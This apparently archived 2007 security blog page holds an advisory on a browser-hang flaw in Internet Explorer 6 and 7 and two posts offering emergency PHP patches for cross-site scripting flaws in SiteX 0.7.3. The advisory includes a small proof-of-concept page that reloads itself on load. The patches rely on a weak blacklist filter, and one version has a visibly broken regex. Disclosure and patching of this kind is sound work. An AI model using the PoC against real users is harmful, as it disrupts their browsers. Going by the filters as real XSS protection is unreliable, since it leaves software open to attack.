Internet Explorer Body tag recoverable DoS issue

Wednesday, April 25, 2007
#####################################################
Internet Explorer Body tag recoverable DoS issue
Vendor url:http://www.microsoft.com
Advisore:http://lostmon.blogspot.com/2007/04/posible-ie7-dos.html
Vendor notify:YES Vendor confirmed:YES Exploit include:YES
#####################################################


Microsoft Internet Explorer contains a flaw that may allow a
malicious user to cause IE7 to enter a loop in which IE7
become unresponsive resulting in a recoverable DoS issue.
(Only affect the process what we open the file)the user,only can
terminate the process

The result in Internet Explorer is the browser seems to "hang".
I have not discovered a way to leverage the "hang" to gain
execution of arbitrary code.


############
versions
############

Tested on all of this versions:

#########
IE7
#########

Windows Vista =>vulnerable
Windows XP SP2 =>vulnerable
Windows XP Home SP2 =>vulnerable

#########
IE6
#########

Windows 2000 => Not vulnerable ?
Windows XP SP2 =>vulnerable
Windows XP Home SP2 =>vulnerable


############
Solution
###########

Microsoft is working in a
update version, patch or similar.

#############
Timeline
#############

Discovered:29-01-2007
Vendor notify: 11-03-2007
Vendor response:11-03-2007
Private Disclosure:07-02-2007
Public Disclosure: 25-04-2007



#########################

IE7 and 6 Body tag PoC

#########################



###################

Source of eso.pl

###################



 print  "<html>\ n";
 print  "<head>";
 print  "<title>";
 print  "Internet Explorer Body tag DoS Perl PoC By Lostmon
(lostmon@Gmail.com)";
 print  "</title>";
 print  "</head>";
 print  "<body onload='location.reload()'>";
 print  "<p><a href='http://lostmon.blogspot.com/'>";
 print  "Internet Explorer Body tag DoS Perl PoC By Lostmon
(lostmon@Gmail.com)";
 print  "</a></p>";
 print  "</body>";
 print  "</html>";

##############################

##############################

Source of eso.html

##############################



 print  "<html>\ n"
 print  "<head>"
 print  "<title>"
 print  "Internet Explorer Body tag DoS Perl PoC By Lostmon
(lostmon@Gmail.com)"
 print  "</title>"
 print  "</head>"
 print  "<body onload='location.reload()'>"
 print  "<p><a href='http://lostmon.blogspot.com/'>"
 print  "Internet Explorer Body tag DoS Perl PoC By Lostmon
(lostmon@Gmail.com)"
 print  "</a></p>"
 print  "</body>"
 print  "</html>"


###############################

###############################

Source of eso.htm

###############################



<html>
<head>
<title>
Internet Explorer Body tag DoS Perl PoC By Lostmon (lostmon@Gmail.com)
</title>
</head>
<body onload='location.reload()'>
<p><a href='http://lostmon.blogspot.com/'>
Internet Explorer Body tag DoS Perl PoC By Lostmon (lostmon@Gmail.com)
</a>
</p>
</body>
</html>

################################



#######################End###################



Special THnx to Secunia Research Team they made
me include/understand of which one treated and
put in my hands !!!ALL!!! What i need for this research !!!!
Secunia:http://www.secunia.com/

Thnx To estrella pq siempre estas en mi pensamiento
aunque no coincidamos y por plantar en mi la semilla
de la curiosidad , durante noches y noches !!

Thnx To FalconDeOro :
la paciencia es un a virtud pequeño Jedy !!
Gracias por tu ayuda y soporte :*

Thnx to all Microsoft Security Response Center
in specia To Annette.
http://www.microsoft.com/technet/security/

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Final patch For SiteX 0.7.3 beta XSS flaws

Saturday, April 21, 2007
####################################################
Patch for SiteX 0.7.3 beta XSS flaws
vendor url: http://sitex.bjsintay.com/
original article:http://lostmon.blogspot.com/2007/04/
final-patch-for-sitex-073-beta-xss.html
####################################################

patch for all of this related vulns:


http://osvdb.org/displayvuln.php?osvdb_id=33158
http://osvdb.org/displayvuln.php?osvdb_id=33159
http://osvdb.org/displayvuln.php?osvdb_id=33160

In all Files what we edit are included this file :

'includes/functions.php'

Open this file and add a new Function arround line 12-13

#####################################################
// stop XSS function to mitigate the posible XSS flaws
//use StopXSS(param or function)

function StopXSS($text){

$text = preg_replace("/(\<script)(.*?)(script>)/si", "", "$text");
$text = strip_tags($text);
$text = str_replace(array("'","\"",">","<","\\","`","´"), "", $text);
return $text;

}


####################################################

change this code :
####################################################
// - = - = - = - = - = - = - = - = -
// GLOBAL CODE
// - = - = - = - = - = - = - = - = -

// Convert post, get, and server variables for shorthand use and
// register globals compatibility

if (!empty($_POST)) foreach ($_POST as $k => $v) $$k = $v;
if (!empty($_GET)) foreach ($_GET as $k => $v) $$k = $v;
if (!empty($_SERVER)) foreach ($_SERVER as $k => $v) $$k = $v;
if (!empty($_COOKIE)) foreach ($_COOKIE as $k => $v) $$k = $v;
if (!empty($_SESSION)) foreach ($_SESSION as $k => $v) $$k = $v;

// Prevent PHP include vulnerability, initialize important vars,
will be over-written
#####################################################
for this other:
#####################################################
// - = - = - = - = - = - = - = - = -
// GLOBAL CODE
// - = - = - = - = - = - = - = - = -

// Convert post, get, and server variables for shorthand use and
// register globals compatibility

if (!empty($_POST)) foreach ($_POST as $k => $v) $$k = $v;
if (!empty($_GET)) foreach ($_GET as $k => $v) $$k = StopXSS($v);
if (!empty($_SERVER)) foreach ($_SERVER as $k => $v) $$k = StopXSS($v);
if (!empty($_COOKIE)) foreach ($_COOKIE as $k => $v) $$k = StopXSS($v);
if (!empty($_SESSION)) foreach ($_SESSION as $k => $v) $$k = StopXSS($v);

// Prevent PHP include vulnerability, initialize important vars, will be over-written
#####################################################

SiteX in full of XSS flaws , all variables are afected.


########################
OSVDB ID: 33158
########################
calendar.php
Cross-Site Scripting in variables $sxMonth and $sxYear fixed !!

########################
OSVDB ID: 33159
########################
search.php
Cross-site scripting in $search fixed !!

########################
OSVDB ID:33160
########################
redirect.php
Cross-Site scripting in $linkid fixed !!

#####################################################

it also fix this variables:

- albumid and page upon submision to adbum.php
- error upon submision to login.php
- type upon submision to search.php
- sxEntryID upon submision to journal.php
- photoid,albumid and page upon submision to photo.php
- forumid and topicid upon submision forums_topic.php

###################################################
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Posible patch for sitex

Saturday, April 14, 2007
Hello !

vendor url: http://sitex.bjsintay.com/

Specific entry:http://sourceforge.net/tracker/index.php?
func=detail&aid=1700736&group_id=121558&atid=690690

osvdb id:33158,33159,33160,33161

http://archives.neohapsis.com/archives/bugtraq/2007-02/0477.html

http://www.securityfocus.com/archive/1/archive
/1/461305/100/0/threaded


http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-1234

after study this vulns i found a simple posible patch.

Some others params are afected like albumid upon submit to albun.php
username box upon submision to login.php ,search box upon submision
to search.php and multiple others params.

The most of those flaws could be solve by a simple patch
for "emergency" before the vendor release a update or a patch.

Open includes/functions.php

arround line 12-13 we have this code
####################################################
// - = - = - = - = - = - = - = - = -
// GLOBAL CODE
// - = - = - = - = - = - = - = - = -

// Convert post, get, and server variables for shorthand use and
// register globals compatibility

if (!empty($_POST)) foreach ($_POST as $k => $v) $$k = $v;
if (!empty($_GET)) foreach ($_GET as $k => $v) $$k = $v;
if (!empty($_SERVER)) foreach ($_SERVER as $k => $v) $$k = $v;
if (!empty($_COOKIE)) foreach ($_COOKIE as $k => $v) $$k = $v;
if (!empty($_SESSION)) foreach ($_SESSION as $k => $v) $$k = $v;

// Prevent PHP include vulnerability, initialize important vars,
will be over-written
##################################################


you can change for this other :

##################################################

// stop XSS function to mitigate the posible XSS flaws
//use StopXSS(param or function)

function StopXSS($text){

$text = preg_replace("/(\)/si", "", "$text");
$text = strip_tags($text);
$text = str_replace(array("'","\"",">","<","\\"), "", $text);
return $text;

}

// - = - = - = - = - = - = - = - = -
// GLOBAL CODE
// - = - = - = - = - = - = - = - = -

// Convert post, get, and server variables for shorthand use and
// register globals compatibility

if (!empty($_POST)) foreach ($_POST as $k => $v) $$k = StopXSS($v);
if (!empty($_GET)) foreach ($_GET as $k => $v) $$k = StopXSS($v);
if (!empty($_SERVER)) foreach ($_SERVER as $k => $v) $$k = StopXSS($v);
if (!empty($_COOKIE)) foreach ($_COOKIE as $k => $v) $$k = StopXSS($v);
if (!empty($_SESSION)) foreach ($_SESSION as $k => $v) $$k = StopXSS($v);

// Prevent PHP include vulnerability, initialize important vars, will
be over-written

#########################################################

and the most of xss flaws now are solved :D

This patch are explain and update here :

http://lostmon.blogspot.com/2007/04/
final-patch-for-sitex-073-beta-xss.html

Thnx for your time !!!

Thnx to OSVDB !!!

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...